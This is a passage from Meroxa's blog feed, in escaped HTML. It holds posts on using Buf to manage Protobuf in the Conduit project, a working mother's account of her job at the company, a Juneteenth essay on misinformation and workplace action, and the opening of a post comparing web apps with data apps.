class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 3&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;691297882&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 3&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;trial&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 4&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;234317840&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 4&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;trial&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 5&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1564914498&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 5&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;trial&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That’s all it takes! If you have any questions, suggestions, or just generally want to talk about streaming data, feel free to start a &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub discussion&lt;/a&gt; or have a conversation with us on &lt;a href=&quot;https://discord.meroxa.com&quot;&gt;discord&lt;/a&gt;. And don’t forget to follow us on &lt;a href=&quot;https://twitter.com/ConduitIO&quot;&gt;Twitter&lt;/a&gt; if you aren’t already.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[How Conduit uses Buf to work with Protobuf]]></title><description><![CDATA[We faced challenges with Protobuf, so we began looking for a resolution... enter Buf!]]></description><link>https://meroxa.com/blog/how-conduit-uses-buf-to-work-with-protobuf</link><guid isPermaLink="false">https://meroxa.com/blog/how-conduit-uses-buf-to-work-with-protobuf</guid><dc:creator><![CDATA[Lovro Mažgon]]></dc:creator><pubDate>Thu, 07 Jul 2022 17:30:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt;, our Kafka Connect alternative written in Go, uses Protobuf on two fronts:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;To define the gRPC API,&lt;/li&gt;
&lt;li&gt;It is the protocol used for communicating with standalone connectors.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;However, we started facing challenges when working with Protobuf that impacted our developer experience, so we began looking for ways to resolve these problems. Continue reading to learn more about the challenges we faced and how we resolved them with&lt;a href=&quot;https://buf.build/&quot;&gt;Buf&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;What is Protobuf?&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://developers.google.com/protocol-buffers&quot;&gt;Protobuf&lt;/a&gt; is the short-hand term for “protocol buffers”, a data format with an accompanying interface definition language. You can imagine it as XML or JSON, the difference being that the same data encoded with Protobuf generally results in a smaller memory footprint and better (de)serialization performance. Protobuf is commonly used as the data format in &lt;a href=&quot;https://grpc.io/&quot;&gt;gRPC&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Challenges working with Protobuf&lt;/h3&gt;
&lt;p&gt;While Protobuf solves a&lt;a href=&quot;https://developers.google.com/protocol-buffers/docs/overview#solve&quot;&gt;whole set of problems&lt;/a&gt; it also introduces some challenges. These are the ones we ran into:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Managing Tools&lt;/strong&gt;: To use Protobuf, you need to write a&lt;code class=&quot;language-text&quot;&gt;.proto&lt;/code&gt; file that describes the data structure you intend to serialize. Once you have a Protobuf file, you can run the Protobuf compiler to generate code in any of the supported languages. This in turn means you need to make sure you have the correct version of the compiler, as well as the correct version of any plugins you might need. Managing these tools quickly becomes a problem when multiple developers are involved since they need to ensure their environments are configured the same way.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Managing Dependencies&lt;/strong&gt;: Protobuf files can import dependencies that need to be provided to the compiler at compile time. Developers are left on their own to figure out how to find existing Protobuf definitions, manage the dependencies, and ensure they are up to date.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Evolving the Schema&lt;/strong&gt;: Data structures evolve, and so do Protobuf files. When you need to change the data structures in a Protobuf file there are&lt;a href=&quot;https://developers.google.com/protocol-buffers/docs/proto3#updating&quot;&gt;rules&lt;/a&gt; you have to follow to ensure the new schema is backwards compatible. These rules are not enforced and are easy to miss.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;What is Buf and how are we leveraging it?&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://buf.build/&quot;&gt;Buf&lt;/a&gt; is a set of tools that aim to alleviate the challenges when working with Protobuf. We leverage the following tools to solve the above problems when developing Conduit:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://buf.build/product/cli/&quot;&gt;Buf CLI&lt;/a&gt; comes with a built-in Protobuf compiler, linter, breaking change detection and formatter.&lt;/li&gt;
&lt;li&gt;Buf provides &lt;a href=&quot;https://docs.buf.build/ci-cd/github-actions&quot;&gt;Github Actions&lt;/a&gt; for setting up Buf, running the linter, detecting changes, and pushing Protobufs to their schema registry using the Github CI/CD system.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://buf.build/explore&quot;&gt;Buf Schema Registry&lt;/a&gt; is an online registry where you can push your Protobuf schemas. It will automatically generate a nice UI to browse the documentation of your schema, make it easily available to consumers to import as a dependency, and even automatically generate code so that consumers can entirely skip the compilation step (currently only available for Go).&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Conduit Connector Protocol&lt;/h3&gt;
&lt;p&gt;Conduit has the ability to run connectors as plugins that don’t have to be included in the Conduit binary. Standalone connectors are invoked by Conduit and run in their own process that communicates with Conduit through gRPC (see&lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/architecture-decision-records/20220121-conduit-plugin-architecture.md&quot;&gt;this document&lt;/a&gt; for more information). The gRPC service definitions and data structures are defined in the Github repository&lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-protocol&quot;&gt;ConduitIO/conduit-connector-protocol&lt;/a&gt; which is using Buf to manage Protobuf definitions. Here we will describe how we structured our workflow.&lt;/p&gt;
&lt;h3&gt;CI Actions&lt;/h3&gt;
&lt;p&gt;We use Github Actions provided by Buf to lint our proto files, detect breaking changes and upload them to the Buf Schema Registry. You can find the full workflow file&lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-protocol/blob/main/.github/workflows/buf.yml&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let’s first look at the&lt;code class=&quot;language-text&quot;&gt;validate&lt;/code&gt; job that contains the first two steps.
First, we need to do some setup — we check out the repository (&lt;a href=&quot;https://github.com/actions/checkout&quot;&gt;actions/checkout&lt;/a&gt;) and install the latest Buf CLI (&lt;a href=&quot;https://github.com/bufbuild/buf-setup-action&quot;&gt;bufbuild/buf-setup-action&lt;/a&gt;). After that, we are ready to call the lint action (&lt;a href=&quot;https://github.com/bufbuild/buf-lint-action&quot;&gt;bufbuild/buf-lint-action&lt;/a&gt;) that ensures our proto files follow the defined style guide.&lt;/p&gt;
&lt;p&gt;After the lint is successful, we execute an action ensuring the new schema is backwards compatible with the old one. We achieve this by first fetching the main branch and executing the breaking action (&lt;a href=&quot;https://github.com/bufbuild/buf-breaking-action&quot;&gt;bufbuild/buf-breaking-action&lt;/a&gt;) against the current content of the main branch.&lt;/p&gt;
&lt;p&gt;If the &lt;code class=&quot;language-text&quot;&gt;validate&lt;/code&gt; job succeeds and the action is being executed on a commit to the main branch, then we trigger the job &lt;code class=&quot;language-text&quot;&gt;push&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;You’ll notice this job also starts with the checkout and Buf setup actions, followed by the push action (&lt;a href=&quot;https://github.com/bufbuild/buf-push-action&quot;&gt;bufbuild/buf-push-action&lt;/a&gt;) that takes a secret token to authenticate with the Buf Schema Registry and pushes the new Protobuf definitions.&lt;/p&gt;
&lt;p&gt;These Github Actions result in a workflow that doesn’t rely on the developer having their local environment set up correctly, as the CI/CD is the single place where all Protobuf files are validated. Additionally, we don’t need to share secrets between developers, the CI/CD takes care of pushing schemas to the registry.&lt;/p&gt;
&lt;h3&gt;Schema Registry&lt;/h3&gt;
&lt;p&gt;We use the Buf Schema Registry to host the Protobuf definitions and get a UI for our&lt;a href=&quot;https://buf.build/conduitio/conduit-connector-protocol/docs/main:connector.v1&quot;&gt;docs&lt;/a&gt;. The registry also tracks old versions of the same schema file so anyone referencing an older version can keep using it or update to the new version using&lt;code class=&quot;language-text&quot;&gt;buf mod update&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;Remote Code Generation&lt;/h3&gt;
&lt;p&gt;Pushing our Protobuf definitions to the Buf Schema Registry opens up the possibility of using&lt;a href=&quot;https://docs.buf.build/bsr/remote-generation/overview&quot;&gt;remote code generation&lt;/a&gt;. The registry will take care of generating the Go code for us and expose it as a go module, ready to be imported. This feature allows us to entirely skip the manual compiling step and simply import the compiled code as a dependency.&lt;/p&gt;
&lt;p&gt;For instance, to fetch the latest Conduit connector protocol code we can invoke this command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;go get go.buf.build/protocolbuffers/go/conduitio/conduit-connector-protocol&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Every time we update the Protobuf definitions and push them to the registry, the code will be remotely generated and ready to be used in any dependent code.&lt;/p&gt;
&lt;h3&gt;Local Development&lt;/h3&gt;
&lt;p&gt;Our workflow heavily leans on hosted services like Github Actions and the Buf Schema Registry, so the natural question is how can we do local development? The answer are go mod&lt;a href=&quot;https://go.dev/ref/mod#go-mod-file-replace&quot;&gt;replace directives&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To switch to locally generated Protobuf code we follow the following steps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;buf generate&lt;/code&gt; — executing this in the&lt;code class=&quot;language-text&quot;&gt;proto&lt;/code&gt; folder will compile the proto files and generate Go code locally in the folder&lt;code class=&quot;language-text&quot;&gt;internal&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;go mod init github.com/conduitio/conduit-connector-protocol/internal&lt;/code&gt; — executing this in folder&lt;code class=&quot;language-text&quot;&gt;internal&lt;/code&gt; will initialize a (temporary) Go module in the newly generated Go code&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;go mod edit -replace go.buf.build/library/go-grpc/conduitio/conduit-connector-protocol=./internal&lt;/code&gt; — executing this at the root of the repository will replace any references to the remotely generated code with the locally generated code (similarly we can do this for other repositories that depend on remotely generated code)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://buf.build/&quot;&gt;Buf&lt;/a&gt; is a great tool that allows us to streamline the management of our Protobuf files, ensures we follow code guidelines and don’t unknowingly introduce breaking changes. It solves these problems in an elegant way and enhances the developer experience.&lt;/p&gt;
&lt;p&gt;You know what else enhances the developer experience? &lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt;! We’re still very much in the early stages and rely on the feedback of our community to steer the project in the right direction. Try it out… if you like it join the &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;discussion&lt;/a&gt; and show us some love!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Being a Meroxa Mom]]></title><description><![CDATA[Candidates are often intrigued by perks like unlimited time off and flexible hours. But do those perks actually come through once they land the job?]]></description><link>https://meroxa.com/blog/being-a-meroxa-mom</link><guid isPermaLink="false">https://meroxa.com/blog/being-a-meroxa-mom</guid><dc:creator><![CDATA[Jane Lombardi]]></dc:creator><pubDate>Wed, 29 Jun 2022 14:17:00 GMT</pubDate><content:encoded>&lt;p&gt;We’ve all been pitched or at least heard of startup companies’ “perks.” Some of them include open vacation policies, unlimited sick leave, working the hours that are best for you (“as long as you get the work done, we don’t care”), and so many more. Many candidates leave the interview process feeling excited and motivated about these “perks,” but do they actually come to fruition once they land the job?&lt;/p&gt;
&lt;p&gt;For some, yes. For others, I’m afraid no. Many companies are eager to pitch these perks, but the reality is often the complete opposite. Some employees find themselves working more hours than before, taking little to no vacation time, eating all meals in the office (because you know they are free), and working non-traditional hours to meet the demands of a hyper-growth startup.&lt;/p&gt;
&lt;p&gt;It was the Fall of 2020 when I was first introduced to DeVaris Brown, CEO of Meroxa, as they were looking for a Head of People. I had just welcomed my first baby into the world in July and to be honest, was not eager or excited to go back to work just yet. I had just endured a covid pregnancy and just helped a company get acquired, an event that was a 24/7 job for three months straight. I was truly a little burnt out and thought maybe it was time I took a break from my professional career and spend my time at home raising my baby girl.&lt;/p&gt;
&lt;p&gt;I preach to those I mentor the power of networking and how you should “always take the call” as you never know how that person could impact your life now or in the future. So, I took the call. My first conversation with DeVaris was casual, informative, and really was time used to get to know one another and really understand what he was looking for. I felt our conversation was genuine. I thought he was an easy guy to talk to and thought to myself, “you know, he is probably someone I could work with.” Still, though, even after having that initial positive experience, I left not really caring about the next steps or if he would ask me to proceed to the next rounds. (A very uncharacteristic behavior for me to feel, hello new mom emotions!) A few days later he reached out to me and asked me to conduct a panel interview with other Meroxa employees, I agreed to the call and we set it up.&lt;/p&gt;
&lt;p&gt;My panel interview with the team went exceptionally well. They asked me questions I had never been asked before, they too were genuine, and I left the conversation excited. I then had a follow-up with DeVaris to really dig into the job itself and understand exactly what he needed out of this position. Note, at the time of my interviews, Meroxa only had about 12 employees. DeVaris also disclosed to me he was hiring a Head of Operations.&lt;/p&gt;
&lt;p&gt;I allowed for a few days of self-reflection before asking DeVaris for an additional conversation. During those days of self-reflection, I came to the realization that I just wasn’t ready to jump back into a full-time position. I really wanted to focus on being the best Mom to my daughter.&lt;/p&gt;
&lt;p&gt;Ultimately, I decided that during my next conversation with DeVaris, I would tell him he didn’t need a full-time Head of People just yet. My plan was to convince him to just hire me as a consultant and I could work as needed and as my busy life as a new Mom allowed. I knew I wanted to stay connected to this company as I believed in the founders, the product, and their vision. In my mind, a consultant was the perfect way to do that.&lt;/p&gt;
&lt;p&gt;On my call with DeVaris, I did just that. I gave him my whole story (as described above), I told him I was not ready to commit to a full working day (and hours that come with that) and be away from my daughter at this time. He politely pushed back and asked why I couldn’t do both? He described to me that he wasn’t looking to demand a 14-hour work day from me, he wasn’t going to be bugging me at 2 AM on a “fire drill” that couldn’t wait, and he wasn’t looking to micromanage how I got my work done. Ultimately, he made it very clear that he respected my first job, being a mother, as the most important job I have.&lt;/p&gt;
&lt;p&gt;Fast forward a few days later, I found myself accepting a job as the Head of People for Meroxa. Before signing, I was very clear that I wanted to be there when my daughter woke up each morning to feed her breakfast. I wanted to make her dinner at night, sit down with her at dinner, and most importantly tuck her in. This was all not only welcomed with open hands but encouraged. I felt comfortable accepting this offer because of the honest, open, and transparent conversation I was able to have DeVaris. I’ve firsthand seen and heard of so many moms wishing for this type of work-life relationship but never had the courage to speak to their manager about it and ultimately never saw it come to fruition. I am grateful to Meroxa and DeVaris for creating a culture where I feel comfortable expressing my needs and most importantly actually honoring those needs.&lt;/p&gt;
&lt;p&gt;So in the spirit of full transparency because that is what we at Meroxa are all about, let’s talk about what a day in the life of Jane as a working Mom looks like. I have established clear, set, “working hours’’ in my calendar visible to everyone in the company. These working hours are from 10 AM-3 PM. What this means is that between 10 AM-3 PM, I have my most important meetings with my team and the rest of the company. It’s when I can guarantee a face-to-face Google Meet without a baby crying in the background or any other major type of distraction. I complete my other work which I categorize as “admin work” between the hours of 6 AM-8 AM before my daughter wakes up and again from 8:00 PM-10:00 PM after I put my daughter down for the night. Does this work for me? Yes. Does it work for every Mom? Maybe not. Most importantly, these hours are respected by my team and the entire Meroxa community. I feel fortunate every day to work for a company that REALLY means “family first.”&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Juneteenth — The Impact of Misinformation & Action Items for the Workplace]]></title><description><![CDATA[If you want to do more than encourage your employees to spend money at a Black-owned restaurant on Juneteenth, here are some impactful actions your company can make.]]></description><link>https://meroxa.com/blog/juneteenth-the-impact-of-misinformation-and-action-items-for-the-workplac</link><guid isPermaLink="false">https://meroxa.com/blog/juneteenth-the-impact-of-misinformation-and-action-items-for-the-workplac</guid><dc:creator><![CDATA[Idalin Bobe]]></dc:creator><pubDate>Thu, 16 Jun 2022 13:50:00 GMT</pubDate><content:encoded>&lt;h3&gt;&lt;strong&gt;Misinformation is Not New&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;People often call our current era “&lt;a href=&quot;https://yalebooks.yale.edu/book/9780300251852/the-misinformation-age/&quot;&gt;The Age of Misinformation&lt;/a&gt;” or “&lt;a href=&quot;https://www.nytimes.com/2021/05/07/world/asia/misinformation-disinformation-fake-news.html&quot;&gt;The Misinformation Era&lt;/a&gt;,” where people share alternative facts, and depending on who you know and what you read, you will absorb certain truths. However, to call misinformation new is to forget moments in American history like&lt;a href=&quot;https://nmaahc.si.edu/explore/stories/historical-legacy-juneteenth&quot;&gt;Juneteenth&lt;/a&gt; (short for “June Nineteenth”). Juneteenth marks the day when federal troops arrived in Galveston, Texas, in 1865 to ensure that all enslaved people were freed. Nearly 250,000 people were forced to remain enslaved in Texas two and a half years after President Abraham Lincoln freed enslaved people in the Confederate States through the&lt;a href=&quot;https://en.wikipedia.org/wiki/Emancipation_Proclamation&quot;&gt;Emancipation Proclamation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Juneteenth is known as “Black Freedom Day.” Sadly, Juneteenth does not represent the end of slavery in America, as it is often reported. It specifically notes the end of slavery in Texas. Slavery continued to thrive in several border states and other states unaffected by the Emancipation Proclamation, including non-confederate States like Delaware, Maryland, Kentucky, Missouri, and West Virginia. Delaware was&lt;a href=&quot;https://whyy.org/articles/juneteenth-did-not-mean-freedom-for-delaware-slaves/&quot;&gt;the last to free its nearly 2,000&lt;/a&gt;enslaved people on December 6, 1865, six months after Texas, due to the passing of the&lt;a href=&quot;https://nmaahc.si.edu/explore/stories/13th-amendment-us-constitution-passed&quot;&gt;Thirteenth Amendment&lt;/a&gt;that officially abolished slavery throughout all of the United States. And finally,&lt;a href=&quot;https://abcnews.go.com/blogs/headlines/2013/02/mississippi-officially-abolishes-slavery-ratifies-13th-amendment&quot;&gt;in 1995&lt;/a&gt;, Mississippi was the last state to ratify the 13th amendment.&lt;/p&gt;
&lt;p&gt;&lt;mark&gt;There is nothing wrong with commemorating Juneteenth; Black communities everywhere celebrate the holiday. However, America cannot confuse this holiday with progress and justice in the Black community.&lt;/mark&gt; For centuries leaders like Dr. Martin Luther King Jr. fought for racial and economic justice and urgently called for the&lt;a href=&quot;https://mlkglobal.org/background-to-mlk-global-statement/&quot;&gt;redistribution of economic and political power&lt;/a&gt;. Instead, America has given Black people street signs, named schools in honor of heroes, and holidays as people in this community still deal with voter suppression, educational, economic, and criminal injustice. If we are to celebrate Juneteenth, we must do it by organizing, learning, and demanding racial and economic justice. Without true justice, these holidays are absent from the systemic change needed in our society.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;How to Address Misinformation and Juneteenth as a company?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;As many companies give their employees the day off, we must reflect on the labor conditions Black people have been forced to participate in America, even after they were “freed.” The Black community has had to deal with Jim Crow laws, voter suppression, police brutality, redlining, and other practices that still, to this day, impede the rights of Black people living in America. Even with Juneteenth being a federal holiday, people with high-paying salaries, mostly non-Black, will have the day off while low-income hourly workers, mostly people of color, must work.&lt;/p&gt;
&lt;p&gt;If you want to do more than encourage your employees to spend money at a Black-owned restaurant on Juneteenth, here are some other impactful actions your company can make:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Diversify your vendors and sign annual contracts with Black-owned businesses.&lt;/li&gt;
&lt;li&gt;Start an apprenticeship program for marginalized adults looking to break into your industry and partner with amazing organizations like KuraLabs, Resilient Coders, and YearUP. They can help identify and match you with potential talent.&lt;/li&gt;
&lt;li&gt;If your executive team lacks diversity, create an opportunity for marginalized people at your company to pair with your executives and train your next C-level executives. It may take you a few years to take effect, but it shows your company&apos;s commitment to having a diverse succession plan.&lt;/li&gt;
&lt;li&gt;Create a scholarship fund for individuals of color in your local community to help them enter college or a trade program; it can start at $1,000.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Even as you do this, many people at your company, even your leaders, may not understand the importance of supporting these types of programs because they have been impacted by generations of misinformation which is an American reality. Much of America’s Black history has long been distorted. Since the beginning of the country’s inception, disinformation campaigns have been used to hide the truth about the legacy of slavery. Systemic policies continue to hurt Black communities and are used to diminish the contributions Black people have made in building America. Though it is not a company’s primary function to educate its employees and community, we encourage you to create space to host educational workshops with historians who can talk on topics and create an open space for dialogue around addressing misinformation.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Celebrating Juneteenth at Meroxa&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;On June 20th, Meroxa will observe Juneteenth as a holiday for all of its employees (U.S. and Non-U.S.) because racial and economic justice is embedded in our company’s DNA:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;82% of leadership team members identify as a person from an underrepresented community&lt;/li&gt;
&lt;li&gt;38% of the company identifies as a woman&lt;/li&gt;
&lt;li&gt;62% of employees identify as a person of color (40% Black, 17% Latinx)&lt;/li&gt;
&lt;li&gt;24% of employees are based outside of the US&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Meroxa has a diverse team that spans around the world. That is why we hold ourselves accountable for taking time from work to understand the world, especially the social issues impacting marginalized communities. We are intentional about diversity, which is reflected in our team and vendor portfolio. And though we are a young startup, we launched our apprenticeship program in February 2022 to ensure we offer opportunities for Black and Brown people seeking to gain foundational career-building experience in the tech industry. Whether it is a holiday like Juneteenth or engaging in political education workshops, our hope at Meroxa is that our employees will continue to reflect and learn more about critical societal issues and ways to support the advancement of racial and economic justice.&lt;/p&gt;
&lt;p&gt;As we enjoy our day off, we hope to continue to share information to help build a more informed and conscious world and workforce because the impact of misinformation has divided and polarized us for way too long.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[A Tale of Two Apps: Web Apps and Data Apps]]></title><description><![CDATA[A data app is an application that uses real-time or near-real-time events to solve a problem. ]]></description><link>https://meroxa.com/blog/a-tale-of-two-apps-web-apps-and-data-apps</link><guid isPermaLink="false">https://meroxa.com/blog/a-tale-of-two-apps-web-apps-and-data-apps</guid><dc:creator><![CDATA[Simon Lawrence]]></dc:creator><pubDate>Wed, 08 Jun 2022 19:54:00 GMT</pubDate><content:encoded>&lt;p&gt;With Web 2.0 being decades old even those outside of the software engineering world are familiar with the term. The success of Web 2.0 has led to systems that produce unprecedented volumes of data. This deluge of data has created the need for another type of app: the data app.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A data app is an application that uses real-time or near-real-time events to solve a problem.&lt;/strong&gt; This is in contrast to web apps, which are focused on the classic and well-known HTTP request/response model. With web apps, the underlying data architecture and processing are offloaded to backend systems, separate from the frontend system with the UI for the end-user.&lt;/p&gt;
&lt;p&gt;Data apps are the perfect solution to the growing complexity of data-driven applications and the complex data architecture required to process all that data. However, there is a lot of confusion around what makes data apps different from web apps.&lt;/p&gt;
&lt;p&gt;In this article, we’ll compare web apps with data apps. We’ll look at their relationship with interaction models and how data apps might solve problems that web apps aren’t equipped to solve. We’ll close by looking at an example data app built using&lt;a href=&quot;https://docs.meroxa.com/turbine/overview&quot;&gt;Turbine&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let’s dive in.&lt;/p&gt;
&lt;h3&gt;What is a Web App?&lt;/h3&gt;
&lt;p&gt;Generally speaking, most developers are familiar with the concepts surrounding web apps. Web apps use the classic HTTP request and response model to interact and generate data from user interaction.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1120/0*XNqIMHQrrw18pz2a&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;In most cases, the REST API with its CRUD concept has become the de facto approach to dealing with the backend data flow and interactions generated by most web applications.&lt;/p&gt;
&lt;p&gt;Typically, most web apps are made of a frontend, which is more UI-related, generating events and data, while the backend system of REST APIs and other supporting services deal with the processing and movement of the data.&lt;/p&gt;
&lt;h3&gt;What is a Data App?&lt;/h3&gt;
&lt;p&gt;A data app is an application that uses events to solve the same or similar data problems as the backend systems driving many web apps.&lt;/p&gt;
&lt;p&gt;Data apps are more focused, seeking primarily to solve the following technical problems:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Persisting/syncing data and events between and on data infrastructure.&lt;/li&gt;
&lt;li&gt;Transforming and manipulating data between and on data infrastructure.&lt;/li&gt;
&lt;li&gt;Other common data processing tasks between and on data infrastructure.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In most web apps, the core functionality is often to create, consume, or present data. Data apps are a natural evolution towards better design, architecture, and support for the high-volume data-driven software world many developers and engineers find themselves in.&lt;/p&gt;
&lt;h3&gt;Data apps and architecture&lt;/h3&gt;
&lt;p&gt;One important aspect of a data app that distinguishes it from a web app is&lt;strong&gt;the tightening of concerns between infrastructure and code&lt;/strong&gt;. While web apps typically involve both a front-end layer and a back-end layer, data apps operate on the back-end only, interacting directly with the data infrastructure. With the common use cases of real-time or near real-time data, the complexity of the code and the architecture built to support these high-volume data sets has become a serious burden and hurdle for many developers.&lt;/p&gt;
&lt;h3&gt;Interaction Models&lt;/h3&gt;
&lt;p&gt;Before diving further into data models, let’s take a side tour of a topic related to software design: interaction models. In this context, interaction models can help us understand the fundamental differences between web apps and data apps. We’ll look at the two major types of interaction models: user-to-system interactions and system-to-system interactions.&lt;/p&gt;
&lt;h3&gt;User-to-system interaction models&lt;/h3&gt;
&lt;p&gt;User-to-system interaction models are common in the software design of web apps. With the rise in popularity of UX design, we’ve seen an increased emphasis on the interaction between the end-user and the system (the web app).&lt;/p&gt;
&lt;p&gt;In this context, software design is all about modeling the system in a way that helps the end-user interact with the application to perform certain tasks. This could simply be the way a user navigates and interacts with a page or performs certain actions and updates to the system.&lt;/p&gt;
&lt;h3&gt;System-to-system interactions models&lt;/h3&gt;
&lt;p&gt;On the other hand, the system-to-system interaction model has an entirely different goal in mind. System-to-system interactions are often&lt;strong&gt;modeled around how different pieces of infrastructure interact and work together to analyze and process data&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Consider a real-world example: a continuous incoming stream of user clicks from a frontend system that must be processed and made available in a company’s Data Lake for analysis by downstream business units.&lt;/p&gt;
&lt;h3&gt;Closing the gap between web and data apps&lt;/h3&gt;
